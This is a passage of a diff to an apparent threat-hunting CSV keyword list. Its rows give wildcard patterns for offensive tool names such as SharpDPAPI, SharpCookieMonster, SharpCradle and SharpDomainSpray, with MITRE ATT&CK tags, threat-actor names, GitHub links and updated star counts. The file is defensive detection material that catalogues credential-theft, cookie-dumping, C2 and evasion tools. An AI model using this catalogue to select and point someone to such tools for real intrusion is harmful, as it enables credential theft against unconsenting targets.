tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCloud.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpCloud.sln*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" "*SharpCloud-master*","offensive_tool_keyword","SharpCloud","Simple C# for checking for the existence of credential files related to AWS - Microsoft Azure and Google Compute.","T1083 - T1059.001 - T1114.002","TA0007 - TA0002 ","N/A","N/A","Credential Access","https://github.com/chrismaddalena/SharpCloud","1","1","N/A","10","2","154","27","2018-09-18T02:24:10Z","2018-08-20T15:06:22Z" -"*SharpCOM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCOM.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpCOMManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sharpcompile*.exe*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. 
This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*sharpCompileHandler*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpCompileServer*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*SharpCompileServer.exe*","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. 
The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","289","63","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" -"*SharpConfigParser.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*sharpcookiemonster*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 
- T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpConfigParser.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*sharpcookiemonster*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SharpCookieMonster*WebSocket4Net.dll*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.csproj*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. 
even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" -"*SharpCookieMonster.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCookieMonster.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpCookieMonster.exe*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. 
even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonster.sln*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCookieMonsterOriginal.exe*","offensive_tool_keyword","SharpCookieMonster","This C# project will dump cookies for all sites. even those with httpOnly/secure/session","T1539 - T1606","TA0008 - TA0002","N/A","N/A","Exploitation tools","https://github.com/m0rv4i/SharpCookieMonster","1","1","N/A","N/A","2","184","41","2023-03-15T09:51:09Z","2020-01-22T18:39:49Z" "*SharpCradle*logonpasswords*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - 
Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" "*SharpCradle.exe*","offensive_tool_keyword","cobaltstrike","SharpCradle is a tool designed to help penetration testers or red teams download and execute .NET binaries into memory.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/SharpCradle","1","1","N/A","10","10","275","59","2020-12-30T17:15:51Z","2018-10-23T06:21:53Z" -"*SharpCrashEventLog.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpCrashEventLog.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpDcomTrigger.exe*","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","10","4","366","43","2023-08-19T22:45:20Z","2021-09-12T18:18:15Z" -"*SharpDir.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpDllProxy*","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","6","565","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" +"*SharpDir.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpDllProxy*","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","1","N/A","N/A","6","567","76","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "*SharpDomainSpray*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDomainSpray.*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDomainSpray-master*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 
TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" "*SharpDoor.exe*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*SharpDoor-master*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" -"*SharpDPAPI backupkey*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI backupkey*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*SharpDPAPI*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpDPAPI* credentias *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI* vaults *","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.csproj*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.Domain*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpDPAPI.exe*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.ps1*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.sln*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*SharpDPAPI.txt*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*SharpDPAPI* 